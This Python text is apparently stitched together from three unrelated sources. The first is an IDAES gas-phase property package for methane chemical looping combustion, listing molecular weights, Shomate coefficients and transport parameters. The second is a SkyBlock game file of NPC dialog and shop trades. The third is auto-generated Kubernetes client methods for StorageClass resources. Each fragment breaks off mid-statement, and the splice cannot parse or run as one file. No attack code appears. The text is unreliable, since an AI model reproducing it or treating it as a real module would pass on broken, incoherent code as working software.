# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
This package provides the necessary constraints for gas phase properties for
the CLC of methane
Components - Methane (CH4), Carbon Dioxide (CO2), Water (H2O)
Equations written in this model were derived from:
(1) <NAME>, <NAME>, <NAME>, The Properties of Gases and
Liquids, Mcgraw-Hill, New York, 2001.
(2) National Institute of Standards and Technology, NIST Chemistry WebBook,
https://webbook.nist.gov/chemistry/ (accessed March 10, 2018).
"""
# Import Pyomo libraries
from pyomo.environ import (Constraint,
Expression,
Param,
Reals,
value,
log,
Var,
units as pyunits)
from pyomo.util.calc_var_value import calculate_variable_from_constraint
# Import IDAES cores
from idaes.core import (declare_process_block_class,
MaterialFlowBasis,
PhysicalParameterBlock,
StateBlockData,
StateBlock,
MaterialBalanceType,
EnergyBalanceType,
Component,
VaporPhase)
from idaes.core.util.initialization import (fix_state_vars,
revert_state_vars,
solve_indexed_blocks)
from idaes.core.util.misc import add_object_reference
from idaes.core.util.model_statistics import (
degrees_of_freedom,
number_unfixed_variables_in_activated_equalities)
from idaes.core.util.constants import Constants
import idaes.logger as idaeslog
from idaes.core.util import scaling as iscale
from idaes.core.solvers import get_solver
# Some more information about this module
__author__ = "<NAME>"
# Set up logger
_log = idaeslog.getLogger(__name__)
@declare_process_block_class("GasPhaseParameterBlock")
class PhysicalParameterData(PhysicalParameterBlock):
"""
Property Parameter Block Class
Contains parameters and indexing sets associated with properties for
methane CLC.
"""
def build(self):
'''
Callable method for Block construction.
'''
super(PhysicalParameterData, self).build()
self._state_block_class = GasPhaseStateBlock
# Create Phase object
self.Vap = VaporPhase()
# Create Component objects
self.CH4 = Component()
self.CO2 = Component()
self.H2O = Component()
# -------------------------------------------------------------------------
""" Pure gas component properties"""
# Mol. weights of gas - units = kg/mol. ref: NIST webbook
mw_comp_dict = {'CH4': 0.016, 'CO2': 0.044, 'H2O': 0.018}
# Molecular weight should be defined in default units
# (default mass units)/(default amount units)
# per the define_meta.add_default_units method below
self.mw_comp = Param(
self.component_list,
mutable=False,
initialize=mw_comp_dict,
doc="Molecular weights of gas components [kg/mol]",
units=pyunits.kg/pyunits.mol)
# Std. heat of formation of comp. - units = J/(mol comp) - ref: NIST
enth_mol_form_comp_dict = {'CH4': -74.8731E3, 'CO2': -393.5224E3,
'H2O': -241.8264E3}
self.enth_mol_form_comp = Param(
self.component_list,
mutable=False,
initialize=enth_mol_form_comp_dict,
doc="Component molar heats of formation [J/mol]",
units=pyunits.J/pyunits.mol)
# Ideal gas spec. heat capacity parameters(Shomate) of
# components - ref: NIST webbook. Shomate equations from NIST.
# Parameters A-E are used for cp calcs while A-H are used for enthalpy
# calc.
# cp_comp = A + B*T + C*T^2 + D*T^3 + E/(T^2)
# where T = Temperature (K)/1000, and cp_comp = (J/mol.K)
# H_comp = H - H(298.15) = A*T + B*T^2/2 + C*T^3/3 +
# D*T^4/4 - E/T + F - H where T = Temp (K)/1000 and H_comp = (kJ/mol)
cp_param_dict = {
('CH4', 1): -0.7030290,
('CH4', 2): 108.4773000,
('CH4', 3): -42.5215700,
('CH4', 4): 5.8627880,
('CH4', 5): 0.6785650,
('CH4', 6): -76.8437600,
('CH4', 7): 158.7163000,
('CH4', 8): -74.8731000,
('CO2', 1): 24.9973500,
('CO2', 2): 55.1869600,
('CO2', 3): -33.6913700,
('CO2', 4): 7.9483870,
('CO2', 5): -0.1366380,
('CO2', 6): -403.6075000,
('CO2', 7): 228.2431000,
('CO2', 8): -393.5224000,
('H2O', 1): 30.0920000,
('H2O', 2): 6.8325140,
('H2O', 3): 6.7934350,
('H2O', 4): -2.5344800,
('H2O', 5): 0.0821390,
('H2O', 6): -250.8810000,
('H2O', 7): 223.3967000,
('H2O', 8): -241.8264000
}
self.cp_param_1 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 1},
doc="Shomate equation heat capacity coeff 1",
units=pyunits.J/pyunits.mol/pyunits.K)
self.cp_param_2 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 2},
doc="Shomate equation heat capacity coeff 2",
units=pyunits.J/pyunits.mol/pyunits.K/pyunits.kK)
self.cp_param_3 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 3},
doc="Shomate equation heat capacity coeff 3",
units=pyunits.J/pyunits.mol/pyunits.K/pyunits.kK**2)
self.cp_param_4 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 4},
doc="Shomate equation heat capacity coeff 4",
units=pyunits.J/pyunits.mol/pyunits.K/pyunits.kK**3)
self.cp_param_5 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 5},
doc="Shomate equation heat capacity coeff 5",
units=pyunits.J/pyunits.mol/pyunits.K*pyunits.kK**2)
self.cp_param_6 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 6},
doc="Shomate equation heat capacity coeff 6",
units=pyunits.kJ/pyunits.mol)
self.cp_param_7 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 7},
doc="Shomate equation heat capacity coeff 7",
units=pyunits.J/pyunits.mol/pyunits.K)
self.cp_param_8 = Param(
self.component_list,
mutable=False,
initialize={k: v for (k, j), v in
cp_param_dict.items() if j == 8},
doc="Shomate equation heat capacity coeff 8",
units=pyunits.kJ/pyunits.mol)
# Viscosity constants:
# Reference: Perry and Green Handbook; <NAME>, 2008
visc_d_param_dict = {('CH4', 1): 5.2546e-7, ('CH4', 2): 0.59006,
('CH4', 3): 105.67, ('CH4', 4): 0,
('CO2', 1): 2.148e-6, ('CO2', 2): 0.46,
('CO2', 3): 290, ('CO2', 4): 0,
('H2O', 1): 1.7096e-8, ('H2O', 2): 1.1146,
('H2O', 3): 0, ('H2O', 4): 0}
self.visc_d_param_1 = Param(self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
visc_d_param_dict.items()
if j == 1},
doc="Dynamic viscosity constants",
units=pyunits.kg/pyunits.m/pyunits.s)
# The units of parameter 1 are dependent upon the value of parameter 2:
# [visc_d_param_1] = kg/m-s * K^(-(value([visc_d_param_2)))
# this is accounted for in the equation on line 655
self.visc_d_param_2 = Param(self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
visc_d_param_dict.items()
if j == 2},
doc="Dynamic viscosity constants",
units=pyunits.dimensionless)
self.visc_d_param_3 = Param(self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
visc_d_param_dict.items()
if j == 3},
doc="Dynamic viscosity constants",
units=pyunits.K)
self.visc_d_param_4 = Param(self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
visc_d_param_dict.items()
if j == 4},
doc="Dynamic viscosity constants",
units=pyunits.K**2)
# Thermal conductivity constants:
# Reference: Perry and Green Handbook; <NAME>, 2008
therm_cond_param_dict = {('CH4', 1): 8.3983e-6, ('CH4', 2): 1.4268,
('CH4', 3): -49.654, ('CH4', 4): 0,
('CO2', 1): 3.69, ('CO2', 2): -0.3838,
('CO2', 3): 964, ('CO2', 4): 1.86e6,
('H2O', 1): 6.204e-6, ('H2O', 2): 1.3973,
('H2O', 3): 0, ('H2O', 4): 0}
self.therm_cond_param_1 = Param(
self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
therm_cond_param_dict.items()
if j == 1},
doc="Dynamic viscosity constants",
units=pyunits.J/pyunits.m/pyunits.s)
# The units of parameter 1 are dependent upon the value of parameter 2:
# [therm_cond_param_1] = J/m-s * K^(-(1 + value([therm_cond_param_2)))
# this is accounted for in the equation on line 734
self.therm_cond_param_2 = Param(
self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
therm_cond_param_dict.items()
if j == 2},
doc="Dynamic viscosity constants",
units=pyunits.dimensionless)
self.therm_cond_param_3 = Param(
self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
therm_cond_param_dict.items()
if j == 3},
doc="Dynamic viscosity constants",
units=pyunits.K)
self.therm_cond_param_4 = Param(
self.component_list,
mutable=True,
initialize={k: v for (k, j), v in
therm_cond_param_dict.items()
if j == 4},
doc="Dynamic viscosity constants",
units=pyunits.K**2)
# Component diffusion volumes:
# Ref: (1) Prop gas & liquids (2) Fuller et al. IECR, 58(5), 19, 1966
diff_vol_param_dict = {'CH4': 24.42, 'CO2': 26.9, 'H2O': 13.1}
self.diff_vol_param = Param(self.component_list,
mutable=True,
initialize=diff_vol_param_dict,
doc="Component diffusion volumes",
units=pyunits.dimensionless)
# Set default scaling for state variables
self.set_default_scaling("flow_mol", 1e-3)
self.set_default_scaling("pressure", 1e-5)
self.set_default_scaling("temperature", 1e-2)
for comp in self.component_list:
self.set_default_scaling("mole_frac_comp", 1e1, index=comp)
# Set default scaling for thermophysical and transport properties
self.set_default_scaling("enth_mol", 1e-6)
self.set_default_scaling("enth_mol_comp", 1e-6)
self.set_default_scaling("cp_mol", 1e-6)
self.set_default_scaling("cp_mol_comp", 1e-6)
self.set_default_scaling("cp_mass", 1e-6)
self.set_default_scaling("entr_mol", 1e-2)
self.set_default_scaling("entr_mol_phase", 1e-2)
self.set_default_scaling("dens_mol_comp", 1)
self.set_default_scaling("dens_mass", 1e2)
self.set_default_scaling("visc_d_comp", 1e4)
self.set_default_scaling("diffusion_comp", 1e5)
self.set_default_scaling("therm_cond_comp", 1e2)
self.set_default_scaling("visc_d", 1e5)
self.set_default_scaling("therm_cond", 1e0)
self.set_default_scaling("mw", 1e2)
@classmethod
def define_metadata(cls, obj):
obj.add_properties({
'flow_mol': {'method': None, 'units': 'mol/s'},
'pressure': {'method': None, 'units': 'bar'},
'temperature': {'method': None, 'units': 'K'},
'mole_frac_comp': {'method': None, 'units': None},
'mw': {'method': '_mw', 'units': 'kg/mol'},
'cp_mol': {'method': '_cp_mol', 'units': 'J/mol.K'},
'cp_mol_comp': {'method': '_cp_mol_comp',
'units': 'J/mol.K'},
'cp_mass': {'method': '_cp_mass', 'units': 'J/kg.K'},
'dens_mol': {'method': '_dens_mol',
'units': 'mol/m^3'},
'dens_mol_comp': {'method': '_dens_mol_comp',
'units': 'mol/m^3'},
'dens_mass': {'method': '_dens_mass',
'units': 'kg/m^3'},
'enth_mol': {'method': '_enth_mol', 'units': 'J/mol'},
'enth_mol_comp': {'method': '_enth_mol_comp',
'units': 'J/mol'},
'entr_mol': {'method': '_entr_mol', 'units': 'J/mol.K'},
'entr_mol_phase': {'method': '_entr_mol',
'units': 'J/mol/K'},
'visc_d': {'method': '_visc_d', 'units': 'kg/m.s'},
'therm_cond': {'method': '_therm_cond', 'units': 'J/m.K.s'},
'diffusion_comp': {'method': '_diffusion_comp',
'units': 'cm2/s'}})
obj.add_default_units({'time': pyunits.s,
'length': pyunits.m,
'mass': pyunits.kg,
'amount': pyunits.mol,
'temperature': pyunits.K,
})
class _GasPhaseStateBlock(StateBlock):
"""
This Class contains methods which should be applied to State Blocks as a
whole, rather than individual elements of indexed State Blocks.
"""
def initialize(blk, state_args=None, hold_state=False,
state_vars_fixed=False, outlvl=idaeslog.NOTSET,
solver=None, optarg=None):
"""
Initialization routine for property package.
Keyword | |
from ...constant.colors import *
from ...object.object import *
from ..object import *
from .function import reforge
HUB_NPCS = [
Npc('adventurer',
init_dialog=[
("I've seen it all - every island"
" from here to the edge of the world!"),
("Over the years I've acquired"
" a variety of Talismans and Artifacts."),
'For a price, you can have it all!',
'Talk to me again to open the Adventurer Shop!',
],
trades=[
(8, {'name': 'rotten_flesh'}),
(8, {'name': 'bone'}),
(10, {'name': 'string'}),
(14, {'name': 'slime_ball'}),
(10, {'name': 'gunpowder'}),
(500, {'name': 'zombie_talisman'}),
(500, {'name': 'skeleton_talisman'}),
(2500, {'name': 'village_affinity_talisman'}),
(2500, {'name': 'mine_affinity_talisman'}),
(10000, {'name': 'intimidation_talisman'}),
(10000, {'name': 'scavenger_talisman'}),
]),
Npc('alchemist',
init_dialog=[
'There is a darkness in you, adventurer.',
"I've seen it in my flames, you are destined for great things.",
"For now, you shouldn't let it get to your head.",
'Talk to me again to open the Alchemist Shop!',
],
trades=[
(10, {'name': 'nether_wart'}),
(6, {'name': 'bottle'}),
(4, {'name': 'sugar'}),
(10, {'name': 'rabbit_foot'}),
(12, {'name': 'spider_eye'}),
(12, {'name': 'blaze_powder'}),
(200, {'name': 'ghast_tear'}),
(20, {'name': 'magma_cream'}),
]),
Npc('andrew',
dialog=[
(f"This game is still under heavy development,"
f" don't forget to check {GREEN}GitHub{WHITE} often for updates!"),
(f"If you'd like to discuss SkyBlock with other players"
f" then check out the SkyBlock respository"
f" on {GREEN}GitHub{WHITE}!"),
]),
Npc('anita'),
Npc('armorsmith',
init_dialog=[
'A great warrior is nothing without their armor!',
'Talk to me again to open the Armorsmith Shop!',
],
trades=[
(8, {'name': 'leather_helmet'}),
(14, {'name': 'leather_chestplate'}),
(16, {'name': 'leather_leggings'}),
(10, {'name': 'leather_boots'}),
(15, {'name': 'iron_helmet'}),
(20, {'name': 'iron_chestplate'}),
(30, {'name': 'iron_leggings'}),
(20, {'name': 'iron_boots'}),
(350, {'name': 'diamond_helmet',
'enchantments': {'growth': 1}}),
(440, {'name': 'diamond_chestplate',
'enchantments': {'growth': 1}}),
(400, {'name': 'diamond_leggings',
'enchantments': {'growth': 1}}),
(320, {'name': 'diamond_boots',
'enchantments': {'growth': 1}}),
]),
Npc('banker',
dialog=[
'Hello there!',
('You may want to store your coins in a safe place'
' while you are off adventuring.'),
('Leave your coins with me and you will also earn interest'
' at the start of every season!'),
]),
Npc('bea',
init_dialog=[
'Hello! Do you have a pet?',
'Pets are little companions for your adventures in SkyBlock!',
'Personally, I prefer the bee pet!',
],
trades=[
((4999,
{'name': 'coal_block', 'count': 2},
{'name': 'gold_block', 'count': 2}),
{'name': 'bee_pet', 'rarity': 'common'}),
((50000,
{'name': 'coal_block', 'count': 128},
{'name': 'gold_block', 'count': 128}),
{'name': 'bee_pet', 'rarity': 'rare'}),
((200000,
{'name': 'enchanted_coal_block'},
{'name': 'enchanted_gold_block'}),
{'name': 'bee_pet', 'rarity': 'epic'}),
((650000,
{'name': 'enchanted_coal_block', 'count': 8},
{'name': 'enchanted_gold_block', 'count': 8}),
{'name': 'bee_pet', 'rarity': 'legendary'}),
]),
Npc('blacksmith', function=reforge),
Npc('builder',
init_dialog=[
'If you build, they will come!',
'Talk to me again to open the Builder Shop!',
],
trades=[
(1, {'name': 'planks'}),
(4, {'name': 'glass'}),
(22, {'name': 'gravel'}),
(69, {'name': 'obsidian'}),
(1, {'name': 'cobblestone'}),
(1, {'name': 'sand'}),
(3, {'name': 'oak_leaves'}),
(3, {'name': 'birch_leaves'}),
(3, {'name': 'spruce_leaves'}),
(3, {'name': 'dark_oak_leaves'}),
(3, {'name': 'acacia_leaves'}),
(3, {'name': 'jungle_leaves'}),
(1, {'name': 'oak_sapling'}),
(1, {'name': 'birch_sapling'}),
(1, {'name': 'spruce_sapling'}),
(1, {'name': 'dark_oak_sapling'}),
(1, {'name': 'acacia_sapling'}),
(1, {'name': 'jungle_sapling'}),
(35, {'name': 'dandelion'}),
(35, {'name': 'poppy'}),
(1, {'name': 'netherrack'}),
(560, {'name': 'sponge'}),
]),
Npc('duke',
dialog=[
'Are you new here? As you can see there is a lot to explore!',
(f'My advice is to start by visiting the {AQUA}Farm{WHITE},'
f' or the {AQUA}Coal Mine{WHITE} both North of here.'),
(f'If you do need some wood, the best place '
f'to get some is West of the {AQUA}Village{WHITE}!'),
]),
Npc('farm_merchant',
init_dialog=[
'You can buy and sell harvested crops with me!',
'Wheat, carrots, potatoes, and melon are my specialties!',
'Talk to me again to open the Farmer Shop!',
],
trades=[
(7 / 3, {'name': 'wheat'}),
(7 / 3, {'name': 'carrot'}),
(7 / 3, {'name': 'potato'}),
(8, {'name': 'pumpkin'}),
(2, {'name': 'melon'}),
(12, {'name': 'red_mushroom'}),
(12, {'name': 'brown_mushroom'}),
(5, {'name': 'cocoa'}),
(5, {'name': 'sugar_cane'}),
(4, {'name': 'sand'}),
(10, {'name': 'rookie_hoe'}),
]),
Npc('fish_merchant',
init_dialog=[
('Fishing is my trade. I buy and sell any fish,'
' rod, or treasure you can find!'),
'Talk to me again to open the Fisherman Shop!',
],
trades=[
(100, {'name': 'fishing_rod',
'enchantments': {'magnet': 1}}),
(20, {'name': 'fish'}),
(30, {'name': 'salmon'}),
(100, {'name': 'clownfish'}),
(40, {'name': 'pufferfish'}),
]),
Npc('jack',
dialog=[
"Use 'stats' to show details about your current stats!",
(f'There are 7 stats in total, including {RED}❤ Health{WHITE},'
f' {RED}❁ Strength{WHITE}, and {GREEN}❈ Defense{WHITE}.'),
('Equipped armor, weapons, and accessories in your inventory'
' all improve your stats.'),
('Additionally, leveling your Skills can permanently'
' boost some of your stats!'),
]),
Npc('jacob',
dialog=[[
'Howdy!',
'I organize farming contests once every few days!',
'You need Farming X to participate! :)',
]]),
Npc('jamie',
init_dialog=[
'You might have noticed that you have a Mana bar!',
'Some items have mysterious properties, called Abilities.',
("Abilities use your Mana as a resource. "
"Here, take this Rogue Sword. I don't need it!"),
],
claim_item={'name': 'rogue_sword'}),
Npc('liam',
dialog=[
'One day those houses in the Village will be rentable for Coins!',
'Anyone will be able to rent them, players, co-ops, even Guilds!',
]),
Npc('librarian',
init_dialog=[
'Greetings! Welcome to the Library!',
('The Library is your one-stop shop for all things enchanting.'
' Enchant items, purchase Enchanted Books, and more'),
('You can enchant items with `enchant`.'
' Enchanting costs experience levels -'
' the more levels you spend, the better enchantments'
' you will receive.'),
'Use `enchant` to enchant an item!',
],
trades=[
(30, {'name': 'experience_bottle'}),
]),
Npc('lonely_philosopher',
init_dialog=['To fast travel or not to fast travel?'],
trades=[
(150_000, {'name': 'travel_scroll_to_castle'}),
]),
Npc('lumber_merchant',
init_dialog=[
'Buy and sell wood and axes with me!',
'Talk to me again to open the Lumberjack Shop!',
],
trades=[
(5, {'name': 'oak_wood'}),
(5, {'name': 'birch_wood'}),
(5, {'name': 'spruce_wood'}),
(5, {'name': 'dark_oak_wood'}),
(5, {'name': 'acacia_wood'}),
(5, {'name': 'jungle_wood'}),
(12, {'name': 'rookie_axe'}),
(35, {'name': 'promising_axe'}),
(100, {'name': 'sweet_axe'}),
(100, {'name': 'efficient_axe'}),
]),
Npc('mine_merchant',
init_dialog=[
'My specialties are ores, stone, and mining equipment.',
'Talk to me again to open the Miner Shop!',
],
trades=[
(4, {'name': 'coal'}),
(5.5, {'name': 'iron'}),
(6, {'name': 'gold'}),
(12, {'name': 'rookie_pickaxe'}),
(35, {'name': 'promising_pickaxe'}),
(({'name': 'gold', 'count': 3},),
{'name': 'golden_pickaxe'}),
(6, {'name': 'gravel'}),
(3, {'name': 'cobblestone'}),
]),
Npc('oringo',
trades=[
((10000,
{'name': 'fish', 'count': 64}),
{'name': 'blue_whale_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_fish'}),
{'name': 'blue_whale_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_fish', 'count': 16}),
{'name': 'blue_whale_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_cooked_fish'}),
{'name': 'blue_whale_pet', 'rarity': 'epic'}),
((10000000,
{'name': 'enchanted_cooked_fish', 'count': 8}),
{'name': 'blue_whale_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'beef', 'count': 64}),
{'name': 'lion_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_beef', 'count': 2}),
{'name': 'lion_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_beef', 'count': 32}),
{'name': 'lion_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_beef', 'count': 256}),
{'name': 'lion_pet', 'rarity': 'epic'}),
((15000000,
{'name': 'enchanted_beef', 'count': 1024}),
{'name': 'lion_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'chicken', 'count': 128}),
{'name': 'tiger_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_chicken', 'count': 2}),
{'name': 'tiger_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_chicken', 'count': 32}),
{'name': 'tiger_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_chicken', 'count': 256}),
{'name': 'tiger_pet', 'rarity': 'epic'}),
((15000000,
{'name': 'enchanted_chicken', 'count': 1024}),
{'name': 'tiger_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'acacia_wood', 'count': 64}),
{'name': 'giraffe_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_acacia'}),
{'name': 'giraffe_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_acacia', 'count': 16}),
{'name': 'giraffe_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_acacia', 'count': 128}),
{'name': 'giraffe_pet', 'rarity': 'epic'}),
((10000000,
{'name': 'enchanted_acacia', 'count': 512}),
{'name': 'giraffe_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'dark_oak_wood', 'count': 64}),
{'name': 'elephant_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_dark_oak'}),
{'name': 'elephant_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_dark_oak', 'count': 16}),
{'name': 'elephant_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_dark_oak', 'count': 128}),
{'name': 'elephant_pet', 'rarity': 'epic'}),
((15000000,
{'name': 'enchanted_dark_oak', 'count': 512}),
{'name': 'elephant_pet', 'rarity': 'legendary'}),
((10000,
{'name': 'jungle_wood', 'count': 64}),
{'name': 'monkey_pet', 'rarity': 'common'}),
((25000,
{'name': 'enchanted_jungle'}),
{'name': 'monkey_pet', 'rarity': 'uncommon'}),
((100000,
{'name': 'enchanted_jungle', 'count': 16}),
{'name': 'monkey_pet', 'rarity': 'rare'}),
((1000000,
{'name': 'enchanted_jungle', 'count': 128}),
{'name': 'monkey_pet', 'rarity': 'epic'}),
((18000000,
{'name': 'enchanted_jungle', 'count': 512}),
{'name': 'monkey_pet', 'rarity': 'legendary'}),
]),
Npc('pat',
init_dialog=[
'You like flint? I like flint! I sell flint!',
("My brother is mining the gravel from the Spider's Den."
" We are the Flint Bros!"),
'Talk to me again to open my shop!',
],
trades=[
(6, {'name': 'flint'}),
(4, {'name': 'gravel'}),
]),
Npc('ryu',
dialog=[
'There are 9 Skills in SkyBlock!',
('Farming, Mining, Foraging, Fishing, | |
the required parameter `name` when calling `delete_storage_v1beta1_storage_class`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_storage_v1beta1_storage_class`")
collection_formats = {}
resource_path = '/apis/storage.k8s.io/v1beta1/storageclasses/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def get_storage_v1beta1_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_storage_v1beta1_api_resources(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_storage_v1beta1_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_storage_v1beta1_api_resources_with_http_info(**kwargs)
return data
def get_storage_v1beta1_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_storage_v1beta1_api_resources_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_storage_v1beta1_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/storage.k8s.io/v1beta1/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedAPIResourceList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def list_storage_v1beta1_storage_class(self, **kwargs):
"""
list or watch objects of kind StorageClass
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_storage_v1beta1_storage_class(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1beta1StorageClassList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_storage_v1beta1_storage_class_with_http_info(**kwargs)
else:
(data) = self.list_storage_v1beta1_storage_class_with_http_info(**kwargs)
return data
def list_storage_v1beta1_storage_class_with_http_info(self, **kwargs):
"""
list or watch objects of kind StorageClass
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_storage_v1beta1_storage_class_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1beta1StorageClassList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_storage_v1beta1_storage_class" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/storage.k8s.io/v1beta1/storageclasses'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1beta1StorageClassList',
auth_settings=auth_settings,
callback=params.get('callback'),
